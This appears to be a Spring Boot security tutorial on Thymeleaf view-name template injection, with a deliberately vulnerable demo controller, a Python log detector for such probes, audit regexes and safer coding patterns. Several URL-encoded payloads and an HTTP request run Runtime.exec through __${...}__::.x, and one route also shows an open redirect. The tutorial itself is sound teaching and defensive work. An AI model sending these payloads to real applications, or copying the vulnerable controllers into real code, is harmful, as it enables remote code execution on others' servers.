@RequestMapping("/path")
public String path(@RequestParam String lang) {
    return lang;
}
By Spring Boot's definition, if the controller has no return value, the @GetMapping route is used as the view name. For an HTTP request this means the request URL itself becomes the view name, which is then handed to the template engine for resolution.

@GetMapping("/doc/{document}")
public void getDocument(@PathVariable String document) {
    logger.info("Retrieving " + document);
}
__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x
GET /doc/__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1659928725
Connection: close
Payload construction. Note: a payload concatenated after the template name must end with ::.x
package com.thymeleaf.jack.controller;

import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
 * Author:Jack @Date:2022.09.28
 */
// An expression built as __${}__::.x is executed by Thymeleaf
@Controller
public class demo {
    private static final Logger logger = LogManager.getLogger(demo.class);

    @RequestMapping("/index")
    public String getIndex(Model model) {
        model.addAttribute("name", "jack");
        return "index";
    }

    // A payload concatenated after the template name must end with ::.x
    //path?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x
    @RequestMapping("/path")
    public String path(@RequestParam String lang) {
        return "user/" + lang + "/welcome";
    }

    // By Spring Boot's definition, if the controller has no return value, the @GetMapping route is used as the view name.
    // For every HTTP request this means the request URL is used as the view name and handed to the template engine for resolution.
    //poc:/doc/__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x
    @GetMapping("/doc/{document}")
    public void getDocument(@PathVariable String document) {
        logger.info("Retrieving " + document);
    }

    // In this PoC the trailing ::.x can be omitted
    ///fragment?section=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__
    @GetMapping("/fragment")
    public String fragment(@RequestParam String section) {
        return "welcome :: " + section; // fragment is tainted
    }
}
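To spot these probes on the receiving side, here is an added detection example (not code from the original post or the demo project), written in Python rather than the Java of the demo app: it parses constructed Common Log Format access-log lines, URL-decodes each request target twice and flags the Thymeleaf preprocessing marker __${...}__ and the :: fragment selector that the /doc and /fragment PoCs above rely on. The log lines and the 7*7 probe value are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format). The two probes carry a
# harmless Thymeleaf preprocessing expression (__${7*7}__), once with the ::.x
# fragment suffix on the /doc path variable and once without it on /fragment.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2022:13:55:36 +0000] "GET /doc/readme HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2022:13:55:40 +0000] "GET /doc/__$%7b7*7%7d__::.x HTTP/1.1" 500 87
10.0.0.9 - - [10/Oct/2022:13:55:41 +0000] "GET /fragment?section=__$%7b7*7%7d__ HTTP/1.1" 200 30
10.0.0.7 - - [10/Oct/2022:13:55:42 +0000] "GET /index HTTP/1.1" 200 120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Thymeleaf preprocessing marker __${...}__ : never part of a legitimate URL.
PREPROCESS_RE = re.compile(r"__\$\{.*?\}__", re.S)
# Fragment selector "::" (optionally followed by ".x"): a weaker signal on its own.
FRAGMENT_RE = re.compile(r"::\s*\.?\w*")


def decode_target(target):
    """URL-decode the request target twice so a double-encoded probe is still visible."""
    return unquote(unquote(target))


def indicators(target):
    """Return the list of Thymeleaf view-name injection indicators in one request target."""
    decoded = decode_target(target)
    found = []
    if PREPROCESS_RE.search(decoded):
        found.append("thymeleaf-preprocessing")
    if FRAGMENT_RE.search(decoded):
        found.append("fragment-selector")
    return found


def scan_access_log(text):
    """Parse CLF lines and return one alert dict per request that carries an indicator."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than crash on odd lines
        found = indicators(m["target"])
        if found:
            alerts.append({"ip": m["ip"], "method": m["method"],
                           "target": m["target"], "status": int(m["status"]),
                           "indicators": found})
    return alerts
```

Running scan_access_log(SAMPLE_LOG) yields two alerts, both from 10.0.0.9; the /doc probe carries both indicators, the /fragment probe only the preprocessing marker.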
<!DOCTYPE html>
<html lang="en" xmlns:th="http://www.thymeleaf.org">
<head>
    <meta charset="UTF-8">
    <title>title</title>
</head>
<body>
    hello 第一个Thymeleaf程序
    <div th:text="${name}"></div>
</body>
</html>
Audit regexes. To find return statements that pass a template name to the view resolver: return.*?\".*?<template name>, for example return.*?\".*?index. For @GetMapping routes with no return value, first search with @GetMapping\(.*?\)\s*public\s+void/gm.
@RequestMapping("/vulnpath")
public String path(@RequestParam String lang) {
    return lang;
}

@RequestMapping("/safepath")
public String path(@RequestParam int lang) {
    // The numeric parameter only selects from a fixed set of template names,
    // so the user-controlled value never reaches the view name itself.
    HashMap<Integer, String> tems = new HashMap<Integer, String>();
    tems.put(1, "red template");
    tems.put(2, "yellow template");
    tems.put(3, "green template");
    // An unknown key yields null; Spring then falls back to the default view name
    // derived from the request path ("safepath"), which is still not attacker-controlled.
    return tems.get(lang);
}
With @ResponseBody or @RestController, template resolution is no longer invoked.

@GetMapping("/safe/redirect")
public String redirect(@RequestParam String url) {
    return "redirect:" + url;
    // CWE-601, as we can control the hostname in redirect
}
If ThymeleafView does not render the result, there is nothing to exploit. By Spring Boot's definition, if the name starts with redirect:, the controller's return value is no longer resolved by ThymeleafView but by RedirectView. HttpServletResponse: when the handler method declares an HttpServletResponse parameter, Spring assumes the method has already handled the HTTP response, so no view-name resolution takes place.

@GetMapping("/safe/doc/{document}")
public void getDocument(@PathVariable String document, HttpServletResponse response) {
    log.info("Retrieving " + document);
}